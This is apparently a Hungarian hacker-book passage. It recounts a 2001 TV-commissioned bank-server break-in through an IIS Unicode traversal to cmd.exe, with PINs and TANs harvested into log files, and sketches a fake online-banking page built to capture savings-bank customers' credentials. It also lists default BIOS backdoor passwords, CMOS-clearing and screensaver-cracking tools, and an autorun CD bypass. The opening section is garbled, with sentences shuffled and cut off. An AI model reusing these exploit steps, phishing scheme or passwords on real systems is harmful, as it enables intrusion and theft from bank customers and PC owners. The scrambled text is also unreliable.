. hogy gépeljék be 6.vagy 10-jegyű online számukat. mint például a HTTP_AGENT vagy a Remote-IP minden kérdésnél. Tehát engedélyezett kapcsolatból kellett olvasni és írni. Végül a fájlt törölni kellett.de/scripts/. Megjegyzés: az adminisztrátor ezt a könyvtárat könyörtelelnül törölhette volna. hogy az első lépés már el volt intézve. hogy egyszerűen féltőkének egy trójait. át lehetett írni a bejelentkező-scriptet úgy.%c255winnt/system32/cmd. ha a CMD. Mivel azonban az ASP-hez és a HTML-hez is metakarakterek szükségesek. A szerver támadhatóságának tesztelése A webszerver egy fatálisán szabványos exploitra volt érzékeny: http://www. amely szövegkarakterekből áll. Alapvetően az echo DOS-paranccsal lehet fájlokba írni..ini könyvtárban tárolják a bank ügyfeleinek folyószámlaszámát. mivel a bank scriptjei nem hajtanak végre bináris fájlokat. letöltötték. Az ASP-scriptet. Amint a feltöltő-script a szerveren volt. Ebben a könyvtárban volt egy alkönyvtár. A sorokat tehát cookie-ként küldték el. hogy ez a folyamat ne legyen olyan könnyen felfedezhető. amelybe csak egy kódolt kapcsolattal lehet bejutni. Az IIS „sípolta" a konzolfájlok kiadását. majd egy hiperhivat-kozáson keresztül lehetett letölteni. Tiltott kimenő kapcsolatok Az első terv az volt. és ezzel felhasználhatók más alkalmazások számára is. ami azután kényelmes olvasási és írási elérést kínálna. környezeti változóként tárolódnak. Ezeket az adatokat aztán egy Session Cookie-ban (kódolt.7 Az adatletöltés A megváltoztatott scriptek a C:\Temp\ 000043FA.. és ezért itt már nem kellett foglalkozni vele! .3.> nem lehetett írni. illetve töltenek fel. PIN kódjukat. ezeket nem lehetett a böngészőn keresztül bevinni. majd törölték.. Az utolsó és legnagyobb dobás az volt. ezért egyfajta shellt kaptak a böngészőn keresztül. 1. A cookie-t mint HTTP_COOKIE-t tárolták.EXE-vel. Az olvasási elérés nem volt probléma: az olvasandó fájlokat a webkönyvtárba másolták. Azonosítás és kapcsolat A weboldalakhoz vezető útvonal így nézett ki: C:\Inetpub\Root\Bank. hogy tiltva voltak a kimenő kapcsolatok. mivel a sornak URL kódoltnak kellett lennie. illetve nincs szükségük ilyenekre. és ezután az echo+%HTTP_COOKIE% -val egyszerűen lehetett írni. mint pl. viszont bináris adatokat és metakaraktereket. PIN-jét és IP-jét.EXE-t. l .EXE-t a /c paraméterrel (egyedüli parancs) futtatták. A bökkenő az írás volt.: <. ahhoz először a webkönyvtárba kellett másolni. Ebben a könyvtárban volt azoknak a fájloknak a nagy része. Az ügyfeleket felkérik. hogy a bejelentkező adatok a felhasználói űrlapról közvetlenül egy logfájlba vándoroljanak. amelyeket az online banki szolgáltatás használ. és ezért a legrosszabb esetben háromszor olyan nagy lehetett volna. az SSL miatt) tárolja a rendszer. amelyeknek a webszerver a környezete. a sok nem alfanumerikus karakter miatt. Az adatok. A támadási tervről Bináris fájlokat ASP-scripttel írnak. hogy a metakaraktereket idézőjelekbe csomagolva a szintakszisnak megfelelően írták (az ASP-scripthez). meg lehet írni a CMD. és a kívánt bankot (a •••-t vagy a •••-t).böngészőből. Hogy ezt a fájlt le lehessen tölteni. A szövegkarakterekkel nem is volt gond. Ez azonban meghiúsult azon. és a sorok „komplex" módon épülnek fel. például a CMD.exe Itt egy hibáról volt szó egy átadott parancs dekódolásánál és legitimációjánál. ami végrehajtáshoz vezet. Figyelembe kellett venni.

hogy Ideiglenes Intézkedést adjanak ki. 1.5 millió adatot (online számokat.31-ig folyt.10. hogy egy pillantást vessenek az ügyfelek részvényletétjére. pineket. hogy minden adatot vissza kell szolgáltatni nekik.A Bank.4 Utóirat a bank-hackeléshez A logfájlok áthúzása 2001. amelyben úgy ítéltek. amelyet egy semleges közjegyzőnek adtak át Hamburgban. 1.04-től 2001. Ebben az időben több mint 1.dat képernyője A logfájlokból kapott adatokkal most már be lehetett jelentkezni az ügyfelek folyószámlájára. A •• bank a Hamburgi Területi Bíróságon 2001. ahol bezárták egy széfbe ezeket. Egy folyószámla képernyője Egy részvény-portfólió képernyője S még arra is nyílt lehetőség.08. 08. IP-címeket) mentettek le. és ott egy széfbe zárták.5 Összefoglalás Az említett eseményeket követően a könyv szerzője elbeszélgetett az ismert német biztonsági . Az adatokat végül az NDR jogi osztályának adták át.04-én elérte. Az NDR bizonyítékként csak egy másolatot tartott meg.

Az információk neveket. ahová csak az ügyfelek léphetnek be megfelelő azonosítást követően (WWW/SSL/SHTTP/ jelszóvédelem). a Technikai Tanácsadó (Ratgeber Technik) hírszerkesztő csoportjának hamburgi vezetője azt nyilatkozta a Newsbytes-nak. hogy a legszívesebben abban a minutumban mondtam volna fel a folyószámlámat. Az e-banking területet védeni kell. mivel néhány nagy bank biztonsági tanácsadója. amelyeknek a birtokába jutottunk. így ékelődött: „Tudják. A www. du.washingtonpost. biztonsági megbízottak vagy auditorok nem tudnak mit kezdeni a biztonsági rendszer logfájljaival.szakértővel.com és a www. Marc Riief-fel. Voltak pereim ezelőtt is. Azután van egy félig nyilványos terület. hogy az ARD jogi részlege szerint az ilyesfajta oknyo-mozó újságírást megengedi a német jog.. Bernd Leptihn. És persze vannak olyan intézmények is. „A (bankszámla) információkkal. mivel nincs meg a szükséges háttértudásuk. hogy mondjam: vannak ilyenek és olyanok is. amelyek kitűnő kompetenciával tűnnek ki." 1. hogy van egy nyilvános rész. a nyilvánosság informálása a ••• számítógépének hiányosságairól nagyon is a köz érdekében történt. 17. akikre utalt. Szerintem a bökkenő a kiértékelésnél van. tűzfal-elemek és Intrusion Detection System) a pénzügyi szektorban aránylag gyakran a rendelkezésre áll (ellentétben más terület hálózati kapcsolattal működő cégeivel). Cornelia Klaila. Leptihn.. Ezzel azt akarom mondani. A nyilvános részt elhanyagolhatják. Ruef pontosan ismeri a gondot.newsbytes. A következőket mondta: „Sok bank webes fellépése megosztott. Az erre hivatott rendszeradminisztrátorok. Ösz-szességében azt kell. Az „ők". Nem szabad valamennyit egy kalap alá venni. ezt nyilatkozta a Newsbytes-nak: „Amit tettek. Németország két közszolgálati tévéhálózatának egyike gyárt. Mindenesetre bőven van még tennivaló. amelyet az ARD. ami gyakran így is történik (nem viszik túlzásba a biztonsági mechanizmusokat és irányvonalakat). Ezeknek az adminisztrációja is többnyire jó . az törvénytelen. ha az „a köz érdekét szolgálja". Newsbytes MÜNCHEN. A sztorit vasárnap este közvetítették. és információkat töltsenek le az ügyfelek számláiról. A megfelelő szoftver és hardver a naplózáshoz és a biztonsághoz (pl. Számtalan újság és rádióállomás számolt be az akcióról.. Nagyon törvénytelen. PIN-számokat és internetes IP-számokat tartalmaztak. hogy betörjenek a ••• online banki szerverébe. de mostanáig soha nem vesztettem el egyetlen ügyet sem.6 Sajtóbeszámolók A bank-hackelés világszerte nagy visszhangot keltett. Ebben az összefüggésben újra és újra előkerült a biztonság kérdése.com tudósításai Német tv-s hackerek bankszervert törtek fel per van kilátásban Ned Stafford. számlaszámokat. amelyet mindenki elérhet (WWW/HTTP). Leptihn szerint.de sajnos nem nagyon jó . de most a kamera mögött dolgozik. erős irányvonalak. és ez meg is történik (a legújabb patchek. a ••• müncheni szóvivője. amelyek fontosak a biztonságos online banki szolgáltatáshoz. én 30 éve csinálok törvénytelen dolgokat. a Technikai Tanácsadó nevű tv-show. A Technikai Tanácsadó augusztusban felfogadott néhány fiatalembert. szept. Láttam már olyan banki számítógépeket. az e~banking. aki amúgy jól ismert személyiség Németországban. Németország egyik legnagyobb bankja. NÉMETORSZÁG 2001. megfelelő biztonsági intézkedések). 4:51 ••••. hogy nem aggódik a ••• perindítása miatt. íme két érdekes vélemény. ." Azt mondta. biztosított rendszer. most akárhol is lehetnénk a világban. millió és millió euró birtokában" mondta. aki 27 éve a Technical Adviser frontembere. amely hackereket szerződtetett. a bankok biztonsági problematikájáról.kezekben van. a bank szóvivője szerint jogi lépéseket tervez egy népszerű fogyasztói high-tech tv-show ellen. hogy feltörjék a bank online banking szerverét.

A zdnet. hogy ő és a csapata részt vettek egy telekonferenciás hívásban a ••• technikai személyzetével. hogy a ••• banknál bizony van néhány nagy biztonsági rés. Négyük közül az egyik Stephan Weide. A bank a Microsoft Internet Information Serverét (IIS 4." Miután a Technikai Tanácsadó vasárnap éjszaka a tévében megszellőztette az ügyet. hogy elveszítik az állásukat. A Technikai Tanácsadó megbízott egy négytagú hackercsapatot.mondta. hogy bűntetőjogi és polgári peres kártérítési per is lehetséges a Technikai Tanácsadó ellen. amelyek értelmetlenné teszik a pénzintézet kódolási eljárását. a számlákat a kimerítésig terhelhették volna. Miután a magazin figyelmeztette a •••-t központi számítógépének a hiányosságaira. hogy az új oldal az utolsó éjszaka előtt biztonságos lett volna. Ahogy az ARD a továbbiakban közölte. és sikerrel jártak" -állította. A fiatal hackerek inkább abban voltak érdekeltek. Klaila azt mondta. 22 évesen a Multimedia Network Systems cég ügyvezetője Leinefeldében. a régi és az új is online-ban voltak. De elvileg sok más banknál és takarékpénztárnál is lehetséges lenne egy virtuális betörés. „A hackereink ismét próbálkoztak az új site-on.mint mondta mindkét oldal. és hogy ez az oldal state-of-the-art rendszer.t választották. hogyan tudják befoltozni a réseket. Weide azt mondta. 2001. Klaila.vélekedett. és nem az újra törtek be. a hackereknek dispo-kredit adatokat is sikerült elérniük. de ez „nem volt sok". Azt hiszem. hogy a weboldalt a szokásos rendszeres karbantartás és nem a biztonsági rések kijavítása miatt állították le.Leptihn arra is utalt. Azt nem árulta el. Augusztus hónap folyamán . hogy publicitást nyerjenek induló internetes biztonsági tanácsadó cégüknek . Még egy laptoppal és egy adatátvitelre alkalmas mobiltelefonnnal is gond nélkül lehet jogosulatlanul pénzt átutalni. hogy a ••• bank ezen a nyáron egy új online weboldalt helyezett üzembe. ami biztonságos.7 Tapaszatalatok más bankoknál Nem csak a ••• nincs felvértezve a támadások ellen. Leptihn viszont vitatta. így a szerkesztőknek és a szakértőknek a műsor adatai szerint lehetővé vált néhány napon belül 1.de News tudósítása ARD: Online banki szolgáltatásbeli hiányosságokat lepleztek le PIN-eket és TAN-eket olvastak ki bekapcsolt kamera előtt. működő kamera előtt törték fel a ••• biztonsági mechanizmusait. hogy mennyit fizettek nekik. Weide azt nyilatkozta a Newsbytes-nak. 1. s azt állította. A tévéadó komputeres szakemberei ismételten óvtak a trójaiktól. azt mondta: „Nem mondtak csúnya szavakat. 08:46 óra Thüringiai hackerek a Ratgeber: Technik ARD-magazin megbízásából. Az adó által felfogadott hackerek azonban ebben az átdolgozott programban is találtak réseket. hogy a ••• online banking oldala vasárnap késő éjjeltől kezdve úgy hat órára leállt. A Ratgeber szerkesztősége szerint azért a •••. hogy megmondják nekik. ezt nyomatékosan kétségbe vonta. beleértve titkos kódokat (PIN). „Még el kell döntenünk. a bank szóvivője. mit is akarunk tenni. és a hackerek a régi weboldalra. Azt is jelezte.5 millió online könyvelési akciót megszerezni.. egy új log-in redszert vezettek be. más bankoknál is csak félig-meddig . az online-számokat (TAN) és az IP-címeket. s így. Behatolásuk bizonyítására a betolakodók csupán egy 100 márkás könyvelésre „korlátozták magukat". mert ez a bank különösen „lukacsosnak" bizonyult a jogosulatlan hozzáférésekkel szemben. hogy a kutatás megmutatta.0) használta. hogy a technikaiak hangot adtak-e haragjuknak a hackelés miatt. bárki meg tudta volna tenni. Mikor megkérdeztük." . és „igazán nem volt gond. A régi weboldalt szeptember elején offline-ba helyezték. szeptember 17." Weide és Leptihn elmondták. hogy a betörés a ••• számítógépébe csak két-három napot vett igénybe. féltek.

Nyíltszívűen .7. amelyben az ügyfél az illető tararékpénztárról információt szerezhet. aki a különböző bankok visszásságainak a feltárására tararékpénztárak biztonsági auditjával bízta meg. és amelyen keresztül egy linkkel a folyószámlájához jut. amely csak nagyon egyszerűen védett. Ezt a takarékpénztáraknál gyakran számítóközpontok kezelik. hogy egy támadás ez ellen a számítógép ellen semmiféle sikerrel sem járna. és a rendszergazda is szívesen elhanyagolja. A tapasztalatokból.a kleinmusterhauseni takarékpénztár Ennek a tararékpénztárnak olyan az internetes megoldása. Többnyire egy helyben lévő vagy szolgáltatón keresztül kezelt szerverről van szó. 1. A szerverek többnyire jól védettek. amelyeket az előző akciókból gyűjtöttek.1 Forgatókönyv a takarékpénztár-területen 2001 októberében a szerző újabb megkeresést kapott valakitől. a következő terv született. egy maghatározott URL begépelésével Itt az átmenet a home-bankinghoz . Van a nyilvános rész. A második terület a tulajdonképpeni e-banking.sikeresek a szerverük védelmére irányuló intézkedések. Ez általában egészen egyszerű felépítésű. amelyek nagyon támadhatóvá teszik a szervert. Bepillantás egy német tararékpénztár jelszó-fájljába. Ezen a webszerveren gyakran tisztán reprezentatív célokból futnak olyan alkalmazások. mint a legtöbbnek Németoszágban: két részből áll. és ki lehet indulni abból.

A támadási terv Először egy biztonsági rést próbáltak keresni. illetve takarékpénztár nyilvános szerverének az elérését. amelyen többnyire HBCI-eszközök meghajtóit vagy különböző online banking szoftverek frissítéseit tárolják. Ez ebben az esetben egy script-hiba vagy egy hibás FTP-szerver lenne. A betörés után megváltoztattak minden oldalt. amelyek a számítóközpontban elhelyezett tulajdonképpeni e-banking gépre mutattak. amely lehetővé teszi az illető bank. Isten hozta a tararékpénztárnál -csak az URL-nek kell a megfelelőnek lenni Példa egy tararékpénztári oldal forrásszövegére megfelelő linkeléssel a számítógép-központhoz A hamisítvány veszi át a szerepet A megfelelő oldal külleméről és működési módjáról rendelkezésre álló információk alapján .

Ha most egy átutaláshoz beírja az adatokat. a tranzakciószámok továbbra is érvényben maradnak. „A kockázatokról és mellékhatásokról kérdezze banki tanácsadóját!" . Mivel a tranzakciók egyike sem lesz végrehajtva. tehát az ügyfeleket a helyi tararékpénztár prezentációjáról a megváltoztatott Folyószámla vagy Onlinebanking link közvetlenül a hamisítványra vezeti. mint a valódi e-banking gépen.hozzákezdtek egy hamisítvány felépítéséhez. Ez a hamisítvány a tuljdonképpeni e-banking számítógépet „tükrözné". ezek az adatok egy logfájlban landolnak. hanem csak a logfájlba vándorol. Az ügyfél ugyanazokat az információkat és opciókat látja maga előtt.

az NT és utódai között 2. és hogyan működnek? 2.4 Jelszóval védett megosztások 2.2.a bennfenteseknek nem okoz problémát 2.1 A hackeren túl .Tartalom 2.2.1.3 Milyen lehetőségeik vannak a betolakodóknak? 2.3.1.1.veszélyes biztonsági rések 2. adatbetekintés vagy lopás 2.3.3.1 Érdekes jelszavak szinte mindenütt akadnak 2.1 A fájl.3.4 További támadási technikák .3 A távoli elérésű támadás internet.5 Brute Force-rohamok a megosztási jelszavak ellen 2.3.és nyomtatómegosztás .2.1.merevlemez-fejreállás.3 Képernyővédő-jelszó . fejezet .2 Mik azok a szkennerek.2.2 A jelszófájlok 2.1 Különbségek a Windows 9x.6 Óvintézkedések 2.3.2 A jelszavak kikémlelése 2. vigyázat! 2.4 Automatikus lejátszás .3 Jelszavak a Windows 2000 alatt 2.vagy hálózati felhasználók.2 A fizikai támadás 2.a betörés előkészítése CD-vel 2.

és azokról a veszélyekről. NT. adatbetekintés vagy lopás A biztonság tulajdonképpen az adatok biztosítási lehetőségeinek az alapvető mérlegelésénél kezdődik. amely növeli a biztonságot. hogy minél öregebb egy számítógép. ami sok . Sajnos. A Windows 95/98/ME-t érő támadásoknak két fajtáját kell megkülönböztetni. amelyeknek az elvesztése. 2.0 és Windows 2000) tervezésénél sokkal tudatosabban koncentrált erre a témára. Hogy mennyire biztonságosak a jelszóval védett képernyőkímélők. mint köztes fokozat. hogy behatoljanak a rendszerekbe. Az egyik a fizikai támadás.merevlemez-fejreállás. 2000) gyenge pontjai a számítógép ebédszünetben bekapcsolva marad. Mivel az adataink nem csak az internetes szörfözés közben vannak veszélyben. Manapság szinte minden számítógép-használónak vannak olyan adatok a gépén. az NT és utódai között A különböző operációs rendszerek közötti alapvető különbség. 2. amelyet az internetről indítanak.esetben egyáltalán nem történik meg. Alapigazság.a legtöbb? . Ráadásul a felhasználói operációs rendszerek gazdái is nagyon megkönnyítik a támadók dolgát. még figyelembe se vettük: ugyan ki szeretné az utolsó adóbevallását vagy bizonyos leveleit rossz kezekben tudni? Az egyedülálló PC-t ugyan inkább a külső hatások (vírusok.1 A hackeren túl . a professzionális területre készült termékek (Windows NT 4. És akkor a további kockázatokat. A BIOS-jelszavas lezárás megkerülésének. de gyakran még a vállalatok is visszariadnak egy jó tűzfal költségeitől. hogy ezt a védelmet megkerülve jussanak be a rendszerbe. illetve az újbóli előállítása a PC árának többszörösébe kerülne. Így a felhasználók ezekkel az operációs rendszerekkel a jövőben is könnyű prédái lesznek mindenfajta hackertámadásnak.A Windows-rendszerek (9x. azt a későbbiekben megmutatjuk. ami igazán csak most. ami a 9x-nél kiegészítő szoftvertől függ. és vele együtt a BIOS. ami a BlOS-jelszónál kezdődik. vagy a kényelem kedvéért lemondanak a BIOS-jelszóról. Míg a Windows 95/98/ME fejlesztésénél a Microsoft a felhasználóbarátság kedvéért elhanyagolta a biztonságot. például egy lopásét. az XP-vel fog megszűnni: az eddigi Windows 9x vonal csak korlátozott védelmet (BIOS-jelszó) kínál a jogosulatlan felhasználás ellen. amelyeknek az adataikat kiteszik. A Windows 95/98/ME felhasználóinak (és valószínűleg azok nagy részének is. akik a Windows XP Home Editionnel fognak dolgozni) többnyire csak csekély ismeretei vannak a biztonságról. lopás stb. Az NT vagy a Windows 2000-es gépeknél ott van még a jelszavas bejelentkezés. a másik a távoli elérésű támadás. ennek ellenére rengeteg más lehetőség is van hozzáférni a személyes adatokhoz: otthon vagy az irodában alapvetően mindenki odaülhet a géphez .és még a legfifikásabb BIOS-jelszó sem ér sokat. illetve feltörésének három alapvető módját különböztetjük meg: • általános jelszó használata a jelszó megszerzése a memóriából • a CMOS szoftverének törlése . illetve feltörni a védelmet.1.1 Különbségek a Windows 9x. amit olyan valaki hajt végre. mielőtt a grafikus felület megjelenne. Emellett az NT-nél és a Windows 2000-nél az adatokat már eleve zárolni lehet. amelyet a felhasználónak a számítógép minden indításához be kell írnia. annál könnyebb kikerülni.1. ez a fejezet az adatbiztonság egészével foglalkozik. A hackereket egyenesen csalogatják a gyenge pontok. akinek közvetlen elérése van a rendszerre. A magánfelhasználók.2 A fizikai támadás A számítógépek védelmének nem túl gyakori módja a BIOS-jelszó beállítása.) vagy a hibás kezelés veszélyezteti. a hackereknek arra is vannak módszereik. ha 2.

ezek közül az egyik legismertebb a KiLLCMOS32. arra az esetre. Azt persze figyelembe kell vennie. A BIOS törléséhez megint csak segédprogramokat használnak a „betörők". és azzal együtt a jelszót is. és minden BIOS-verzióhoz használható.de www. Gyártó: Award BIOSSTAR BIOSTAR ALFAROME q_127&z J64 Password-BlOS-Hacker Oren Levytől Program AMIDECOD Award Modular Bios crack tool CrackAmiBios 1. hogy ilyenkor a rendszerbeállítások is elvesznek. Ezeknek a jelszavaknak a többségét sikerrel teszteltük.Általános jelszó használata A különböző BIOS-verziók gyártói adnak egy általános vagy default jelszót. de valójában a legtöbbnél kérdéses.hackerzbook. ha a biztonságáért aggódó felhasználó egyszer el találná felejteni a jelszavát. A KiLLCMOS32 minden BlOS-beállitást megbízhatóan töröl CONDO awkward BIOSTAR A jelszó megszerzése a memóriából A jelszó memóriából történő megszerzése feltételezi. Ez a segédprogram minden beállítást töröl.de www.hackerzbook. Mindenesetre a rendszernek már futnia kell a használatához. ilyenkor ugyanis segédprogramokkal el lehet érni a memóriában tárolt jelszót.hackerzbook. amelyeket könnyen be lehet szerezni az internetről.M.1 Password for AWARD BIOS BIOS Szerző Danny Soft The Immortal Ismeretlen Oren Levy . AMI?PW AMI?SW AMI_SW AMI Gyártó: Phoenix PHOENIX phoenix CMOS BIOS Altalános jelszavak aLLy Wodj SZYX Syxz Sxyz SKY_FOX setup AMI általános Password (C)alculator AWARD J262 J256 j262 j256 AWARD_SW 589589 AWARD_PW AWARD_PS AWARD?SW AWARD SW AWARD 589721 Általános BlOS-jelszavak Programok a jelszó kiderítéséhez a memóriából SER LKWPETER Ikwpeter HLT A CMOS szoftverének törlése Ha a hacker nem talál általános jelszót vagy megfelelő segédprogramot.de AMI Award Gyártó: AMI PASSWORD Ami A. A különböző BIOS-verziókhoz különböző programok vannak. . hogy vajon még működnek-e.hackerzbook.de www. a használatuknál azonban figyelni kell az amerikai billentyűzetkiosztásra.I. hogy a gép már elindult.de www. mint törölni a BIOS-t. Ezeket a jelszavakat számos oldalról be lehet szerezni az interneten. vagy már teljesen elavultak. Ezekkel a jelszavakkal a számítógépet az utoljára használt és mentett jelszótól függetlenül lehet elindítani.Dynam ic FalCoN 'N' AleX Forrás www.hackerzbook. nem marad más hátra.

A program egy érvénytelen értéket helyez el a CMOS-ban, és ez úgy hat, hogy minden ott tárolt adatot (a jelszót is) újra meg kell adni. A használatának a feltétele azonban az, hogy a számítógép már működik, és szabad a hozzáférés. A http://www.memosys.com/passwort/faq.htm címen további információk találhatók a BIOS-jelszavakról. A jobban informált internet-felhasználók néha azt hiszik, hogy egy rendszert csak az internetről érhetnek támadások, és ez ellen egy tűzfallal jól meg is védik a gépüket. De mi van akkor, ha valaki mondjuk az ebédszünetben fizikailag fér hozzá a számítógéphez? Milyen módszereket fog alkalmazni, hogy kikerülje a képernyővédőt és jelszavakat olvasson ki?

A Windows a jelszó megerősítését kéri

2.1.3 Képernyővédő-jelszóa bennfenteseknek nem okoz problémát
Hogy a számítógépünk rövid távolléteink alatt is védve legyen a kíváncsi szemektől, arról a Windows 95/98/ME alatt a legegyszerűbben képernyővédőjelszóval gondoskodhatunk. Ez a képernyővédő bekapcsolása után csak a megfelelő jelszót megadó felhasználónak engedi meg a rendszer elérését.
Ha a Windows csővezetéket épít vagy Beziergörbéket mutat - csak jelszóval lehetséges a visszatérés

így lehet feltörni a jelszóvédelmet
Az alábbiakban megvilágítjuk, milyen könnyű egy képernyőkímélő jelszavát kikapcsolni, illetve kikerülni, ha a hackernek ehhez elég ideje és tudása van.

Újraindítás
Windows 95/98/ME alatt a Képernyő tulajdonságai ablakban a Képernyőkímélő regiszterlapon a képernyőkímélő bekapcsolása után zárolni lehet a rendszer elérését. Ha mások is hozzáférnek a PC-nkhez, alapvetően be kell állítanunk ezt a jelszót, mert különben könnyen űzhetnek velünk csúnya tréfát: képzeljük el, hogy valaki három perc után induló jelszavas képernyővédőt állít be a gépünkön. Ezután elég egy rövid szünet (telefon vagy hasonló), és máris megakasztotta a munkánkat. Hiszen jelszó híján nem jutunk a PC-hez újraindítás nélkül. Akkor viszont elveszhetnek az adatok, amelyeket esetleg még nem mentettünk el - nagy az ár. Igazán dühödt, primitív, de hatásos módszer a képenyőkímélő-jelszó kikerülésére: a számítógép újraindítása a rését gombbal. Figyelembe kell venni, hogy a nem mentett adatok minden esetben elvesznek, így például a nem mentett Word-dokumentumok vagy a nyitott fájlok stb. Szerencsére ilyenkor a rendszer felhasználója észreveszi a behatolást.

Taskmanager - kapu a betörőnek Windows 95 alatt
Windows 95 alatt a Microsoft még egyszerűbb módot kínál a képernyőkímélő kikerülésére: a Ctrl+Alt+Del billentyűkombináció lenyomásával • mondhatni „majomfogással" - célzottan be lehet zárni a képernyőkímélő program taskját.

Rossz csillagzat alatt született a védelem: egy egérkattintással be lehet zárni a képernyőkímélőt

A Windows 95/98/ME a CD-ROM-meghajtóhoz alapértelmezésként az autoplay (automatikus lejátszás) opciót használja, amelyet a Microsoft Knowledge Base Article Q141059 a következőképpen definiál: „A Windows folyamatosan ellenőrzi a CD-ROM-meghajtót, hogy megállapítsa, helyeztek-e bele CD-ROM-ot. Ha ilyen lemezt fedez fel, ellenőrzi, hogy van-e rajta autorun.inf-fájl. Ha a CD tartalmaz ilyen fájlt, akkor végrehajtja a fájl open= sorába írt parancsokat." Megjegyzés: ezt a témát még a 4.fejezet is tárgyalja, mert az automatikus lejátszás funkciót gyakran használják trójai vírus becsempészésére idegen rendszerekbe. Ehhez lehet a rendszer esetleg futó internetkapcsolatait (vagy hálózatoknál a LAN-kapcsolatokat) használni, és így a PC-hez a képernyőkímélő-jelszó ellenére hozzá lehet férni. Ha a trójai már bent van, a képernyőkímélő-jelszót egészen egyszerűen ki tudja kerülni. Egy ilyen hozzáféréssel a képernyőkímélő-jelszót is ki lehet kapcsolni úgy, hogy: HKEY_CURRENT_USER/Control Panel/desktop/ScreenSaveActive Registrykulcs értékét nullára állítjuk. Van néhány program, amelyeket az automatikus lejátszás funkcióval, a jelszómegadást kikerülendő, fel lehet másolni. Ezeknek a programoknak egyike a Clean Screen. Íme, a használati utasítás, amellyel szükség esetén magunkat is kiszabadíthatjuk (az előkészületeket azonban előre meg kell megtenni, nehogy túl késő legyen): 1. Letölteni (www.hakerzbook.de) és kicsomagolni a ZIP fájlt! 2. Az EXE fájlt és az autostart-ini-t CD-re írni. A két fájlnak a könyvtárfán egészen felül kell lennie, tehát ne valamilyen alkönyvtárba másoljuk. 3. Ha a CD-írás elkészült, akkor egyszerűen próbáljuk ki egyszer a saját PCnken. 4. Képernyőkímélő-jelszó beállítása, majd várakozás, míg a képernyőkímélő elindul. 5. Tegyük az újonnan megírt CD-t a meghajtóba, és várjunk, amíg a PC hangszórója sípolni kezd. Ha nincs bekötve, egyszerűen várjuk ki, míg a CD-ROM-meghajtó leáll. 6. Ezután már csak írjuk be a jelszó lekérdezésére az 123-at, és a képernyőkímélőnek el kell tűnnie!

Védelmi lehetőség Windows 95 felhasználóknak
Ez ellen a támadás ellen csak a Windows 95 Windows 98/ME-re frissítése nyújt védelmet. A képernyőkímélő-jelszó elkerülésének ilyen kísérletei az NT/2000-nél is hatástalanok. A későbbiekből az is ki fog derülni, hogyan is lehet feltörni az ilyen jelszót, mert a jelszavas védelem is csak korlátozott mértékben nyújt biztonságot. A jelszó megfejtése a megfelelő szoftvereszközzel igazán egyszerű, jobb, ha tudjuk, hogy mennyire az. így persze rögtön magunkon is segíthetünk, ha elfelejtettük a saját jelszavunkat.

2.1.4 Automatikus lejátszás a betörés előkészítése CD-vel
A PC-t a BIOS-szal, a képernyőkímélőt jelszóval zároltuk, és talán még a jelszót is úgy választottuk meg, hogy az betűk és számok kombinációjából álljon - most aztán a PC-nk szünetben is bevehetetlen, vagy lehet, hogy mégsem? A következőkből kiderül, hogy milyen eszközöket vethet be ebédszünetben egy potenciális hacker, hogy minden igyekezetünk ellenére hozzáférjen az adatainkhoz.

7. Ezután a program kiírja a régi jelszót, és a Régi érték beállítása paranccsal vissza lehet állni rá. Ha ezt nem tesszük meg, aktuális jelszóként a 123-at tárolja.
A képernyőkímélő-jelszó megszerzése autoplay CD-vel

A képernyőkímélő jelszó kikódolása A képernyőkímélő jelszót a Windows 95/98/ME alapértelmezésként a HKEY\USERS\.Default\Control Panel\Sreen_Save_Data Registry-kulcsban tárolja. A kódolása nagyon egyszerű, és számos programmal feltörhető. A legtöbb programnak az a hátránya, hogy csak akkor működik, ha a képernyőkímélő még nem aktív (hogy mit tehetünk, ha már az, azt már tudjuk).
Jelszófeltörő program működés közben

Védekezés az automatikus indításos támadások ellen Ezeket a támadásokat úgy védhetjük ki, ha a Windows 95/98/ME alatt kikapcsoljuk az automatikus lejátszás funkciót. Ez a következőképpen működik: A Vezérlőpulton kattintsunk duplán a Rendszerre, válasszuk az Eszközkezelő fület, kattintsunk duplán a CD-ROM-ra, és aztán a CD-ROM meghajtófára. A Beállítások regiszterlapon távolítsuk el a pipát az Automatikus lejátszás elől.
Itt találjuk a döntő fontosságú pipácskákat

Néhány program a képernyőkímélő-jelszó feltöréséhez:
Program SCR-it! - 1 .0 verzió SCRNLOCK SS_D 1.0 Win95 Screen Saver Password Cracker v1 . 1 Programok a képernyőkímélő-jelszó feltöréséhez Szerző Yoto Yotov Yoto Yotov Bubble nobody weboldal www.hakerzbook.de www.hakerzbook.de www.hakerzbook.de www.hakerzbook.de

2.2 A jelszavak kikémlelése 2.2.1 Érdekes jelszavak szinte mindenütt akadnak
A helyi támadásoknál nagy szerepe van a jelszavak kikémlelésének. Jelszófeltörők segítségével a hackerek szinte minden, Windows alatt tárolt jelszót meg tudnak szerezni, hogy azután elérjenek velük jelszóval védett fájlokat, az

A dortmundi és a münsteri államügyészség két nagy ügyében kerek kétmillió márkára becsüli a károkat.2. mert akár odáig vezethet. november 5. Sajnos. verziótól kezdve egy automatikus kiegészítést használ. amely a belépési adatok megadása után megkérdezi a felhasználótól. a felhasználóknak pedig egyre nehezebbé teszi a jelszavak elrejtését.2 A jelszófájlok A Windows 95/98/ME PWL fájlokban tárolja a jelszavakat és a felhasználói neveket. A Windows minden PWL-fájlt a Windows könyvtárban tárol. az adatokat kiolvasva. akik mit sem sejtő PC-tulajdonosok költségére szörföztek az interneten. hétfő .silicon. a PWL fájl nevejani. íme egy aktuális példa: 2001.. Erre egyszerű példák találhatók az Internet Explorernél és a telefonos kapcsolatnál. 10:30 .az automatikus kiegészítés A dortmundi államügyészségnél több mint 1000 eljárás van folyamatban gyanúsítottak ellen egész Németországban. a felhasználó költéségén szörfözhet az interneten. a fájlnév pedig a mindenkori felhasználó neve lesz. tehát a c:\windows\ alatt. hogy hozzáférjenek ezekhez az információkhoz. 2. Jelszavak ezreit törték fel de. A hackerek a jelszavakat még az idevágó weboldalakon is nyilvánossá tehették . hogy szeretné-e menteni ezeket. A Windows 95/98/ME alatt minden program eléri a PWL fájlokat. A mit sem sejtő felhasználók számlájára esetenként akár havi 20 ezer márkáért is interneteztek. Ezek az ügyek azonban az államügyész adatai szerint már egy fél évvel ezelőttiek..de Internetezzünk olcsón sokkal több nem is kell hozzá Az így tárolt információkat egy jelszófeltörő segítségével nagyon könnyű kiolvasni. Különösen veszélyes ez a telefonos kapcsolatnál. Az Internet Explorer a 4. hogy valaki. illetve ezek bizonyos területeit.internetet vagy a hálózatot.mondják. Példa: ha a Windowsba Jani néven jelentkezünk be. hogy adatokat tudjon elhelyezni bennük. a 